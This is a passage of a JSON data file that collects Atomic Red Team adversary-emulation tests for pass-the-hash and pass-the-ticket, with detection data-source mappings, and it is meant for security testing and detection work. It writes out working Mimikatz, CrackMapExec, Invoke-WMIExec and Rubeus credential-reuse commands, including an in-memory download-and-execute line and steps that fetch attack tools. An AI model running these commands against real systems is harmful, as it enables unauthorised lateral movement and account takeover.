whoami\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H cc36cf7a8514893efccd3324464tkg1a -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} %userdnsdomain% -u #{user_name} -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash cc36cf7a8514893efccd3324464tkg1a -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username Administrator -Hash #{ntlm} -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command hostname", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username #{user_name} -Hash #{ntlm} -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1550.002", + "display_name": "Use Alternate Authentication Material: Pass the Hash", + "atomic_tests": [ + { + "name": "Mimikatz Pass the Hash", + "auto_generated_guid": "ec23cef9-27d9-46e4-a68d-6f75f7b86908", + "description": "Note: must dump hashes first\n[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username", + "type": "String", + "default": "Administrator" + }, + "ntlm": { + "description": "ntlm hash", + "type": "String", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "%userdnsdomain%" + }, + "mimikatz_path": { + "description": "mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "name": "command_prompt" + } + }, + { + "name": "crackmapexec Pass the Hash", + "auto_generated_guid": "eb05b028-16c8-4ad8-adea-6f5b219da9a9", + "description": "command execute with crackmapexec\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username", + "type": "String", + "default": "Administrator" + }, + "crackmapexec_exe": { + "description": "crackmapexec windows executable", + "type": "Path", + "default": "C:\\CrackMapExecWin\\crackmapexec.exe" + }, + "command": { + "description": "command to execute", + "type": "String", + "default": "whoami" + }, + "ntlm": { + "description": "command", + "type": "String", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "%userdnsdomain%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})\n", + "prereq_command": "if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}\n" + } + ], + "executor": { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "name": "command_prompt" + } + }, + { + "name": "Invoke-WMIExec Pass the Hash", + "auto_generated_guid": "f8757545-b00a-4e4e-8cfb-8cfb961ee713", + "description": "Use Invoke-WMIExec to Pass the Hash\nNote: must dump hashes first\n[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ntlm": { + "description": "ntlm hash", + "type": "string", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "user_name": { + "description": "username", + "type": "string", + "default": "Administrator" + }, + "command": { + "description": "Command to run on target system", + "type": "string", + "default": "hostname" + }, + "target": { + "description": "System to run command on", + "type": "string", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1550.003", + "command_list": [ + null, + "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe \"kerberos::ptt #{ticket}\"\n", + "#{psexec_path} -accepteula \\\\localhost -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:Administrator /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:Password /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c $Env:TEMP\\rubeus.exe asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"$Env:TEMP\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"$Env:TEMP\\rubeus.exe\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "C:\\PSTools\\PsExec.exe -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n" + ], + "commands": [ + { + "command": null, + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe \"kerberos::ptt #{ticket}\"\n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\localhost -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:Administrator /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:Password /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c $Env:TEMP\\rubeus.exe asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"$Env:TEMP\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"$Env:TEMP\\rubeus.exe\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "C:\\PSTools\\PsExec.exe -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1550.003", + "display_name": "Use Alternate Authentication Material: Pass the Ticket", + "atomic_tests": [ + { + "name": "Mimikatz Kerberos Ticket Attack", + "auto_generated_guid": "dbf38128-7ba7-4776-bedf-cc2eed432098", + "description": "Similar to PTH, but attacking Kerberos\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ticket": { + "description": "Ticket file name usually format of 'id-username\\@domain.kirbi' (e.g. can be dumped by \"sekurlsa::tickets /export\" module)", + "type": "String", + "default": null + }, + "mimikatz_exe": { + "description": "Path of the Mimikatz binary", + "type": "Path", + "default": "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", + "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\Mimi.zip\"\nExpand-Archive $env:TEMP\\Mimi.zip $env:TEMP\\Mimi -Force\nNew-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Mimi\\x64\\mimikatz.exe #{mimikatz_exe} -Force\n" + } + ], + "executor": { + "command": "#{mimikatz_exe} \"kerberos::ptt #{ticket}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Rubeus Kerberos Pass The Ticket", + "auto_generated_guid": "a2fc4ec5-12c6-4fb4-b661-961f23f359cb", + "description": "Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).\nPsExec is used to execute commands on the remote system, and the \"C$\" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target": { + "description": "Remote system to request the TGT from", + "type": "string", + "default": "localhost" + }, + "user_name": { + "description": "username associated with the ticket (privileged account not required)", + "type": "String", + "default": "Administrator" + }, + "password": { + "description": "password for user_name", + "type": "String", + "default": "Password" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "$Env:USERDOMAIN" + }, + "rubeus_path": { + "description": "Path of the Rubeus binary", + "type": "Path", + "default": "$Env:TEMP\\rubeus.exe" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + }, + "psexec_path": { + "description": "Path of the PsExec binary", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Rubeus must exist on disk at specified location (#{rubeus_path})\n", + "prereq_command": "if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}\n" + }, + { + "description": "PsExec must exist on disk at specified location (#{psexec_path})\n", + "prereq_command": "if (Test-Path #{psexec_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about 